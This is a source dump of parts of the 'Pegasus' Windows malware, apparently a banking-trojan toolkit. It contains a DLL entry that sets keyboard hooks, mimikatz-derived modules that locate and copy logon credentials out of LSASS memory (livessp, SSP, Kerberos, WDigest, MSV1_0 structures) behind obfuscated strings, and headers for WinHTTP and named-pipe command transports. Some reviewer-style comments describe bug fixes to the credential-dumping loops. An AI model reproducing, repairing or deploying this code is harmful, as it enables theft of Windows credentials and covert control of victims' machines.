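BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	BOOL bRes = TRUE;	// need return TRUE to proceed next
	DWORD dwThreadId;
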
| if (fdwReason == DLL_PROCESS_ATTACH) { 79 | 80 | DbgPrint("DLL_PROCESS_ATTACH: entered, hinstDLL=%p lpvReserved=%p", hinstDLL, lpvReserved); 81 | 82 | // start work 83 | if (kbAreUniq()) { khdSetHooks(); } else { DbgPrint("ERR: already exist"); bRes = FALSE; } 84 | 85 | DbgPrint("DLL_PROCESS_ATTACH: done"); 86 | 87 | } // DLL_PROCESS_ATTACH 88 | 89 | return bRes; 90 | } 91 | 92 | 93 | 94 | 95 | 96 | 97 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/mod_KBRI_hd.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_KBRI_hd.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/mod_KBRI_hd.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Sources\inc 6 | 7 | 8 | Sources\inc 9 | 10 | 11 | Sources\inc 12 | 13 | 14 | 15 | Sources 16 | 17 | 18 | Sources 19 | 20 | 21 | Sources 22 | 23 | 24 | Sources 25 | 26 | 27 | Sources\inc 28 | 29 | 30 | 31 | 32 | Headers\inc 33 | 34 | 35 | Headers\inc 36 | 37 | 38 | Headers\inc 39 | 40 | 41 | 42 | Headers 43 | 44 | 45 | Headers 46 | 47 | 48 | Headers 49 | 50 | 51 | Headers 52 | 53 | 54 | Headers\inc 55 | 56 | 57 | 58 | 59 | {16f04f9c-0d4c-4c7c-adaa-5d51d6851f0c} 60 | 61 | 62 | {ea9d7abd-44ad-4238-8ad1-8fe46c6907d5} 63 | 64 | 65 | {248d21c0-1028-4506-8deb-5ffef60061f5} 66 | 67 | 68 | {7c0b24d0-e1ab-4277-a3a3-1acd5cb48a21} 69 | 70 | 71 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/LogonPasswords.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_LogonPasswords/LogonPasswords.cpp 
-------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/lpmemory.h: -------------------------------------------------------------------------------- 1 | /* 2 | lpmemory.h 3 | */ 4 | 5 | #pragma once 6 | #include 7 | 8 | void * __cdecl operator new(size_t iLen); 9 | void __cdecl operator delete(void *p); 10 | 11 | bool lp_readMemory(const void * adresseBase, void * adresseDestination, size_t longueur = 1, HANDLE handleProcess = INVALID_HANDLE_VALUE); 12 | bool lp_searchMemory(const PBYTE adresseBase, const PBYTE adresseMaxMin, const PBYTE pattern, PBYTE * addressePattern, size_t longueur = 1, bool enAvant = true, HANDLE handleProcess = INVALID_HANDLE_VALUE); 13 | bool lp_searchMemory(const PBYTE adresseBase, const long offsetMaxMin, const PBYTE pattern, long * offsetPattern, size_t longueur = 1, bool enAvant = true, HANDLE handleProcess = INVALID_HANDLE_VALUE); 14 | bool lp_genericPatternSearch(PBYTE * thePtr, wchar_t * moduleName, BYTE pattern[], ULONG taillePattern, LONG offSetToPtr, char * startFunc = NULL, bool enAvant = true, bool noPtr = false); 15 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/lpprocess.h: -------------------------------------------------------------------------------- 1 | /* 2 | lpprocess.h 3 | */ 4 | 5 | #pragma once 6 | #include 7 | #include "LogonPasswords.h" 8 | 9 | /* 10 | typedef struct _KIWI_VERY_BASIC_MODULEENTRY 11 | { 12 | BYTE * modBaseAddr; // Base address of module in th32ProcessID's context 13 | DWORD modBaseSize; // Size in bytes of module starting at modBaseAddr 14 | LPWSTR wszModule; 15 | } KIWI_VERY_BASIC_MODULEENTRY, *PKIWI_VERY_BASIC_MODULEENTRY; 16 | */ 17 | 18 | // callback definition to be called on each received full data chunk 19 | typedef BOOL(CALLBACK* MODULE_INFO_CALLBACK)(KIWI_VERY_BASIC_MODULEENTRY *, LPVOID); 20 | 21 | LPWSTR lp_getUnicodeStringOfProcess(UNICODE_STRING * ptrString, HANDLE 
process, PLSA_PROTECT_MEMORY unProtectFunction = NULL); 22 | bool lp_getVeryBasicModulesListForProcess(MODULE_INFO_CALLBACK miCallback, LPVOID pCallbackParam, HANDLE processHandle); -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/mod_LogonPasswords.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_LogonPasswords.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/kerberos.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_KERBEROS_LOGON_SESSION 12 | { 13 | struct _KIWI_KERBEROS_LOGON_SESSION *Flink; 14 | struct _KIWI_KERBEROS_LOGON_SESSION *Blink; 15 | DWORD UsageCount; 16 | PVOID unk0; 17 | PVOID unk1; 18 | PVOID unk2; 19 | DWORD unk3; 20 | DWORD unk4; 21 | PVOID unk5; 22 | PVOID unk6; 23 | PVOID unk7; 24 | LUID LocallyUniqueIdentifier; 25 | #ifdef _M_IX86 26 | DWORD unk8; 27 | #endif 28 | DWORD unk9; 29 | DWORD unk10; 30 | PVOID unk11; 31 | DWORD unk12; 32 | DWORD unk13; 33 | PVOID unk14; 34 | PVOID unk15; 35 | PVOID unk16; 36 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 37 | } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; 38 | 39 | typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL 40 | { 41 | DWORD unk0; 42 | PVOID unk1; 43 | PVOID unk2; 44 | PVOID unk3; 45 | #ifdef _M_X64 46 | BYTE unk4[32]; 47 | #elif defined _M_IX86 48 | BYTE unk4[20]; 49 | #endif 50 | LUID LocallyUniqueIdentifier; 51 | #ifdef _M_X64 52 | BYTE unk5[44]; 53 | #elif 
defined _M_IX86 54 | BYTE unk5[36]; 55 | #endif 56 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 57 | } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; 58 | 59 | 60 | typedef struct _KERBEROS_MODULE_CONTEXT { 61 | 62 | PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList; 63 | long offsetMagic; 64 | PRTL_AVL_TABLE KerbGlobalLogonSessionTable; 65 | 66 | } KERBEROS_MODULE_CONTEXT, *PKERBEROS_MODULE_CONTEXT; 67 | 68 | VOID kerb_InitGlobals(); 69 | bool searchKerberosFuncs(LP_MODULE_CONTEXT *pContext); 70 | bool WINAPI getKerberosLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 71 | 72 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/livessp.cpp: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #include 8 | #include 9 | 10 | #include "..\lpmemory.h" 11 | #include "..\..\inc\dbg.h" 12 | #include "..\..\inc\mem.h" 13 | #include "..\..\inc\CryptoStrings.h" 14 | 15 | #include "livessp.h" 16 | 17 | PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList; 18 | 19 | VOID lssp_InitGlobals() 20 | { 21 | LiveGlobalLogonSessionList = NULL; 22 | } 23 | 24 | bool searchLiveGlobalLogonSessionList(LP_MODULE_CONTEXT *pContext) 25 | { 26 | LPWSTR wszLivessp; 27 | 28 | #ifdef _M_X64 29 | BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00}; 30 | #elif defined _M_IX86 31 | BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0}; 32 | #endif 33 | LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions = -(5 + 4); 34 | 35 | if (pContext->pModLIVESSP && !LiveGlobalLogonSessionList) 36 | { 37 | 38 | 
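wszLivessp = CRSTRW("livessp", "\x00\x60\xd6\x0d\x07\x60\xda\x0c\x06\x7d\x25\xf6\xe0\x68\xd5");

		PBYTE *pointeur = reinterpret_cast(&LiveGlobalLogonSessionList);
		if (HMODULE monModule = LoadLibrary(wszLivessp))
		{
			MODULEINFO mesInfos;
			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
			{
				lp_genericPatternSearch(pointeur, wszLivessp, PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions);
				*pointeur += pContext->pModLIVESSP->modBaseAddr - reinterpret_cast(mesInfos.lpBaseOfDll);
			}
			FreeLibrary(monModule);
		}

		my_free(wszLivessp);

	}
	return (pContext->pModLIVESSP && LiveGlobalLogonSessionList);
}

/*
	Reports the LiveSSP credential of logon session logId.

	Locates the session's list entry by LUID (lpgetPtrFromLinkedListByLuid on
	the LiveGlobalLogonSessionList resolved by searchLiveGlobalLogonSessionList),
	copies the entry and, when present, its supplemental credential block out
	of LSASS (pContext->hLSASS), and passes the contained
	KIWI_GENERIC_PRIMARY_CREDENTIAL - or NULL when anything was missing - to
	lpgenericCredsToStream.

	Always returns true, like the other sec_pkg getters.

	Fix: the original released its two scratch buffers with
	`delete [] monBuffC, monBuffP;` - the comma operator made that a single
	delete of monBuffC, so monBuffP leaked on every call. Both are now freed.

	NOTE(review): the template arguments of the reinterpret_cast<> calls were
	stripped when this listing was captured; they are kept as they appear
	rather than guessed.
*/
bool WINAPI getLiveSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId)
{
	if (searchLiveGlobalLogonSessionList(pContext))
	{
		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;

		// local copies of the remote structures, filled by lp_readMemory
		BYTE *monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)];
		BYTE *monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)];

		PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast(lpgetPtrFromLinkedListByLuid(pContext, reinterpret_cast(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId));
		if (pLogSession)
		{
			if (lp_readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), pContext->hLSASS))
			{
				// from here on pLogSession refers to the local copy, not to LSASS memory
				pLogSession = reinterpret_cast(monBuffP);
				if (pLogSession->suppCreds)
				{
					if (lp_readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), pContext->hLSASS))
						mesCreds = &(reinterpret_cast(monBuffC)->credentials);
				} //else wcout << L"n.s. (SuppCred KO) / ";
			}
		}
#ifdef _DEBUG
		pContext->wszPackageName = L"livessp";
#endif
		// mesCreds, when set, points into monBuffC: stream before freeing
		lpgenericCredsToStream(pContext, mesCreds, TRUE);

		delete [] monBuffC;
		delete [] monBuffP;

	} //else { DbgPrint("ERR: livessp init failed"); }
	return true;
}
--------------------------------------------------------------------------------
/Pegasus/mod_LogonPasswords/sec_pkg/livessp.h:
--------------------------------------------------------------------------------
/* Benjamin DELPY `gentilkiwi`
	http://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/
	This file : http://creativecommons.org/licenses/by/3.0/
*/
#pragma once
#include "..\LogonPasswords.h"


typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
{
	DWORD isSupp;	// 88h
	DWORD unk0;
	KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY
{
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0; // 1
	PVOID unk1; // 0FFFFFFFFh
	PVOID unk2; // 0FFFFFFFFh
	PVOID unk3; // 0
	DWORD unk4; // 0
	DWORD unk5; // 0
	PVOID unk6; // 20007D0h
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7; // 2000010Dh
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;



VOID lssp_InitGlobals();
bool searchLiveGlobalLogonSessionList(LP_MODULE_CONTEXT *pContext);
bool WINAPI getLiveSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId);

--------------------------------------------------------------------------------
/Pegasus/mod_LogonPasswords/sec_pkg/msv1_0.h:
--------------------------------------------------------------------------------
/* Benjamin DELPY `gentilkiwi`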
http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "../mod_mimikatz_sekurlsa.h" 9 | 10 | class mod_mimikatz_sekurlsa_msv1_0 { 11 | 12 | private: 13 | typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS { 14 | PVOID unk0; // next? 15 | LSA_UNICODE_STRING Primary; 16 | LSA_UNICODE_STRING Credentials; 17 | } KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS; 18 | 19 | typedef struct _KIWI_MSV1_0_CREDENTIALS { 20 | PVOID unk0; // next? 21 | DWORD AuthenticationPackageId; 22 | PVOID PrimaryCredentials; 23 | } KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS; 24 | 25 | typedef struct _KIWI_MSV1_0_LIST_5 { 26 | struct _KIWI_MSV1_0_LIST_5 *Flink; 27 | struct _KIWI_MSV1_0_LIST_5 *Blink; 28 | LUID LocallyUniqueIdentifier; 29 | LSA_UNICODE_STRING UserName; 30 | LSA_UNICODE_STRING Domaine; 31 | PVOID unk14; // 0 32 | PVOID unk15; // 0 33 | PVOID unk16; // offset unk_181A080 34 | DWORD unk17; // 0Ah 35 | DWORD unk18; // 2 36 | #ifdef _M_IX86 37 | DWORD unk19; 38 | #endif 39 | DWORD unk20; // 5AC4186Ch 40 | DWORD unk21; // 1CD6BFDh 41 | LSA_UNICODE_STRING LogonServer; 42 | PKIWI_MSV1_0_CREDENTIALS Credentials; 43 | PVOID unk22; // 0C14h 44 | PVOID unk23; // 0BFCh 45 | } KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5; 46 | 47 | typedef struct _KIWI_MSV1_0_LIST_6 { 48 | struct _KIWI_MSV1_0_LIST_6 *Flink; 49 | struct _KIWI_MSV1_0_LIST_6 *Blink; 50 | PVOID unk0; // unk_18457A0 51 | DWORD unk1; // 0FFFFFFFFh 52 | DWORD unk2; // 0 53 | PVOID unk3; // 0 54 | PVOID unk4; // 0 55 | PVOID unk5; // 0 56 | PVOID unk6; // 0C04h 57 | PVOID unk7; // 0 58 | PVOID unk8; // 0C08h 59 | PVOID unk9; // 0 60 | PVOID unk10; // 0 61 | DWORD unk11; // 0 62 | DWORD unk12; // 0 63 | PVOID unk13; // offset off_18456A0 64 | LUID LocallyUniqueIdentifier; 65 | LUID SecondaryLocallyUniqueIdentifier; 66 | LSA_UNICODE_STRING UserName; 67 | 
LSA_UNICODE_STRING Domaine; 68 | PVOID unk14; // 0 Windows 8 + 2*PVOID / 4*PVOID!! 69 | PVOID unk15; // 0 70 | PVOID unk16; // offset unk_181A080 71 | DWORD unk17; // 0Ah 72 | DWORD unk18; // 2 73 | #ifdef _M_IX86 74 | DWORD unk19; 75 | #endif 76 | DWORD unk20; // 5AC4186Ch 77 | DWORD unk21; // 1CD6BFDh 78 | LSA_UNICODE_STRING LogonServer; 79 | PKIWI_MSV1_0_CREDENTIALS Credentials; 80 | PVOID unk22; // 0C14h 81 | PVOID unk23; // 0BFCh 82 | } KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6; 83 | 84 | typedef struct _MSV1_0_PRIMARY_CREDENTIAL { 85 | LSA_UNICODE_STRING LogonDomainName; 86 | LSA_UNICODE_STRING UserName; 87 | BYTE NtOwfPassword[0x10]; 88 | BYTE LmOwfPassword[0x10]; 89 | BOOLEAN NtPasswordPresent; 90 | BOOLEAN LmPasswordPresent; 91 | wchar_t BuffDomaine[MAX_DOMAIN_LEN]; 92 | wchar_t BuffUserName[MAX_USERNAME_LEN]; 93 | } MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; 94 | 95 | static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); 96 | 97 | static PLIST_ENTRY LogonSessionList; 98 | static PULONG LogonSessionListCount; 99 | static bool searchLogonSessionList(); 100 | 101 | static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity); 102 | public: 103 | static bool getMSV(vector * arguments); 104 | static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity); 105 | }; -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/ssp.cpp: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #include 8 | #include 9 | 10 | #include "..\lpmemory.h" 11 | #include "..\..\inc\dbg.h" 12 | #include "..\..\inc\mem.h" 13 | #include 
"..\..\inc\CryptoStrings.h" 14 | 15 | #include "ssp.h" 16 | 17 | PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList; 18 | 19 | VOID ssp_InitGlobals() 20 | { 21 | SspCredentialList = NULL; 22 | } 23 | 24 | bool searchSSPEntryList(LP_MODULE_CONTEXT *pContext) 25 | { 26 | LPWSTR wszMsv1_0; 27 | 28 | #ifdef _M_X64 29 | BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; 30 | LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3; 31 | BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15}; 32 | LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3; 33 | #elif defined _M_IX86 34 | BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; 35 | LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1; 36 | #endif 37 | 38 | if (pContext->pModMSV && !SspCredentialList) 39 | { 40 | PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; 41 | pointeur= reinterpret_cast(&SspCredentialList); 42 | 43 | #ifdef _M_X64 44 | if (pContext->GLOB_Version.dwMajorVersion < 6) 45 | { 46 | pattern = PTRN_WIN5_SspCredentialList; 47 | taille = sizeof(PTRN_WIN5_SspCredentialList); 48 | offset = OFFS_WIN5_SspCredentialList; 49 | } 50 | else 51 | { 52 | pattern = PTRN_WIN6_SspCredentialList; 53 | taille = sizeof(PTRN_WIN6_SspCredentialList); 54 | offset = OFFS_WIN6_SspCredentialList; 55 | } 56 | #elif defined _M_IX86 57 | pattern = PTRN_WALL_SspCredentialList; 58 | taille = sizeof(PTRN_WALL_SspCredentialList); 59 | offset = OFFS_WALL_SspCredentialList; 60 | #endif 61 | wszMsv1_0 = CRSTRW("msv1_0", "\xff\xff\xd8\x09\xf9\xff\xd5\x12\xf9\xb6\x07\xb1\x95\x13\xf1"); 62 | 63 | if (HMODULE monModule = LoadLibrary(wszMsv1_0)) 64 | { 65 | MODULEINFO mesInfos; 66 | if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) 67 | { 68 | 
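lp_genericPatternSearch(pointeur, wszMsv1_0, pattern, taille, offset);
				*pointeur += pContext->pModMSV->modBaseAddr - reinterpret_cast(mesInfos.lpBaseOfDll);
			}
			FreeLibrary(monModule);
		}
		//SspCredentialList = reinterpret_cast(0x77C5F230);

		my_free(wszMsv1_0);

	}
	return (SspCredentialList);
}

/*
	Walks the SSP credential list inside LSASS (head at SspCredentialList,
	resolved by searchSSPEntryList) and streams every entry whose LogonId
	equals logId through lpgenericCredsToStream.

	pContext - module context; supplies hLSASS for the remote reads
	logId    - logon session whose credentials are wanted

	Always returns true, as before; failures only end the walk early.

	The list is circular and lives in another process, so the walk has to
	terminate even when a read fails or the list is damaged. The original
	loop kept the stale entry after a failed lp_readMemory and spun forever,
	because Flink never changed. A failed read now stops the walk, a NULL
	Flink is rejected, and an iteration cap bounds a corrupted/cyclic list.
*/
bool WINAPI getSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId)
{
	// upper bound on remote entries visited; far above any realistic number of SSP credential records
	const DWORD SSP_MAX_LIST_WALK = 65536;

	if (searchSSPEntryList(pContext))
	{
		KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
		DWORD monNb = 0;		// matching entries reported
		DWORD dwWalked = 0;		// entries visited, for the cap

		// only the LIST_ENTRY head is needed first; its Flink leads to the first real record
		if (lp_readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), pContext->hLSASS))
		{
			while (mesCredentials.Flink && mesCredentials.Flink != SspCredentialList && dwWalked < SSP_MAX_LIST_WALK)
			{
				dwWalked++;

				// a failed remote read leaves mesCredentials stale: stop instead of re-reading the same Flink forever
				if (!lp_readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), pContext->hLSASS))
				{
					DbgPrint("ERR: ssp list read failed at %p", mesCredentials.Flink);
					break;
				}

				if (RtlEqualLuid(logId, &(mesCredentials.LogonId)))
				{
#ifdef _DEBUG
					pContext->wszPackageName = L"ssp";
#endif
					lpgenericCredsToStream(pContext, &mesCredentials.credentials, TRUE);
					monNb++;
				}
			}
		}
	} //else { DbgPrint("ERR: ssp init failed"); }

	return true;
}
--------------------------------------------------------------------------------
/Pegasus/mod_LogonPasswords/sec_pkg/ssp.h:
--------------------------------------------------------------------------------
/* Benjamin DELPY `gentilkiwi`
	http://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/
	This file : http://creativecommons.org/licenses/by/3.0/
*/
#pragma once
#include "..\LogonPasswords.h"


typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
	struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink;
	struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink;
	ULONG References;
	ULONG CredentialReferences;
	LUID LogonId;
	ULONG unk0;
	ULONG unk1;
	ULONG unk2;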
KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 21 | } KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY; 22 | 23 | 24 | 25 | 26 | VOID ssp_InitGlobals(); 27 | bool searchSSPEntryList(LP_MODULE_CONTEXT *pContext); 28 | bool WINAPI getSSPLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 29 | 30 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/tspkg.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { 12 | PVOID unk0; // lock ? 13 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 14 | } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; 15 | 16 | typedef struct _KIWI_TS_CREDENTIAL { 17 | #ifdef _M_X64 18 | BYTE unk0[108]; 19 | #elif defined _M_IX86 20 | BYTE unk0[64]; 21 | #endif 22 | LUID LocallyUniqueIdentifier; 23 | PVOID unk1; 24 | PVOID unk2; 25 | PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; 26 | } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; 27 | 28 | VOID ts_InitGlobals(); 29 | 30 | bool searchTSPKGFuncs(LP_MODULE_CONTEXT *pContext); 31 | bool WINAPI getTsPkgLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 32 | 33 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/wdigest.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | 
typedef struct _KIWI_WDIGEST_LIST_ENTRY { 12 | struct _KIWI_WDIGEST_LIST_ENTRY *Flink; 13 | struct _KIWI_WDIGEST_LIST_ENTRY *Blink; 14 | DWORD UsageCount; 15 | struct _KIWI_WDIGEST_LIST_ENTRY *This; 16 | LUID LocallyUniqueIdentifier; 17 | } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; 18 | 19 | 20 | // internal context structure 21 | typedef struct _WDIGEST_MODULE_CONTEXT { 22 | PKIWI_WDIGEST_LIST_ENTRY l_LogSessList; 23 | long offsetWDigestPrimary; 24 | } WDIGEST_MODULE_CONTEXT, *PWDIGEST_MODULE_CONTEXT; 25 | 26 | 27 | 28 | VOID wdig_InitGlobals(); 29 | bool searchWDigestEntryList(LP_MODULE_CONTEXT *pContext); 30 | bool WINAPI getWDigestLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 31 | -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/NetworkConnectivity.h: -------------------------------------------------------------------------------- 1 | /* 2 | NetworkConnectivity.h 3 | Headers file 4 | */ 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | VOID ncStartNetworkConnectivity(); 15 | 16 | 17 | // used by transport_Pipes.cpp 18 | LPWSTR nmlGetFreshestItem(); 19 | UINT64 ncGetMachineHash(); -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/mod_NetworkConnectivity.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_NetworkConnectivity.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/transport_Pipes.h: -------------------------------------------------------------------------------- 1 | /* 2 | transport_Pipes.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | #include "transport_Generic.h" 10 | 11 | // definition of internal context structure to be used 12 | // while this transport is active 13
| typedef struct _TSPIPES_INTERNAL_CONTEXT { 14 | 15 | LPWSTR wszPipeProxyServer; // name of machine with working pipe proxy server. To be disposed at transport shutdown 16 | 17 | } TSPIPES_INTERNAL_CONTEXT, *PTSPIPES_INTERNAL_CONTEXT; 18 | 19 | PTRANSPORT_HANDLE tspipesInitTransport(); -------------------------------------------------------------------------------- /Pegasus/mod_NetworkConnectivity/transport_WinHTTP.h: -------------------------------------------------------------------------------- 1 | /* 2 | transport_WinHTTP.h 3 | */ 4 | 5 | #pragma once 6 | #include 7 | #include 8 | 9 | #include "transport_Generic.h" 10 | 11 | // internal structure assigned to global init context at TRANSPORT_HANDLE->pInternalModuleContext 12 | typedef struct _WHT_INTERNAL_CONTEXT { 13 | 14 | HINTERNET hSession; // opened WinHTTP session handle 15 | 16 | // wait-related vars 17 | WORD wWaitHour; // specifies a current hour, if it changes -> counter values are emptied 18 | DWORD dwQueryCountCurrentHour; // amount of queries issued in current hour 19 | DWORD 